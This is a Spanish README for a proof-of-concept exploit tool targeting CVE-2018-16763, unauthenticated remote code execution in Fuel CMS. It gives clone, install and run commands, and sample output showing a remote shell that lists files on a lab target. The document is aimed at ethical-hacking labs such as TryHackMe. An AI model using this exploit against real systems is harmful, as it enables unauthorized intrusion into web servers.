
Un exploit de Prueba de Concepto (PoC) para CVE-2018-16763 (Fuel CMS - Ejecución Remota de Código sin autenticación previa).
Un exploit de prueba de concepto (PoC) para CVE-2018-16763 (Fuel CMS - Ejecución remota de código sin autenticación previa).
Este programa en Python 3 sirve como PoC para la vulnerabilidad CVE-2018-16763 en el sistema de gestión de contenidos Fuel CMS. Concretamente, la vulnerabilidad permite la evaluación de código PHP a través del parámetro pages/select/filter (implementado en este PoC), lo que conduce a una ejecución remota de código sin autenticación previa, una vulnerabilidad crítica del sistema.
git clone https://github.com/saccles/CVE-2018-16763-Proof-of-Concept.git
cd CVE-2018-16763-Proof-of-Concept
python3 -m pip install -r requirements.txt
Ejecute el script de exploit contra un objetivo vulnerable. (¡EJECUTE EL SCRIPT SOLO CONTRA UN OBJETIVO QUE LE PERTENEZCA O QUE SEA PROPORCIONADO POR TryHackMe, HackTheBox U OTRO SITIO WEB DE HACKING ÉTICO!) Recomiendo probar el desafío "Ignite" de TryHackMe para más detalles. También puede descargar la aplicación vulnerable Fuel CMS desde exploit-db.com.
python3 CVE-2018-16763.py -u URL
[DEBUG] Connecting to http://10.10.60.46 ...
[DEBUG] Succesfully connected!
Enter Command:
$ ls -la
total 52
drwxrwxrwx 4 root root 4096 Jul 26 2019 .
drwxr-xr-x 3 root root 4096 Jul 26 2019 ..
-rw-r--r-- 1 root root 163 Jul 26 2019 .htaccess
-rwxrwxrwx 1 root root 1427 Jul 26 2019 README.md
drwxrwxrwx 9 root root 4096 Jul 26 2019 assets
-rwxrwxrwx 1 root root 193 Jul 26 2019 composer.json
-rwxrwxrwx 1 root root 6502 Jul 26 2019 contributing.md
drwxrwxrwx 9 root root 4096 Jul 26 2019 fuel
-rwxrwxrwx 1 root root 11802 Jul 26 2019 index.php
-rwxrwxrwx 1 root root 30 Jul 26 2019 robots.txt
python3 CVE-2018-16763.py -h
usage: CVE-2018-16763.py [-h] -u URL
This tool exploits CVE-2018-16763 on Fuel CMS.
options:
-h, --help show this help message and exit
-u URL, --url URL Fuel CMS url.
Silas Accles [saccles]
Este proyecto está licenciado bajo la Licencia MIT; consulte el archivo LICENSE.md para más detalles.
Muy inspirado en los programas de Exploit-DB, los scripts PoC de Vozec y el PoC original desarrollado por Padsala Trushal.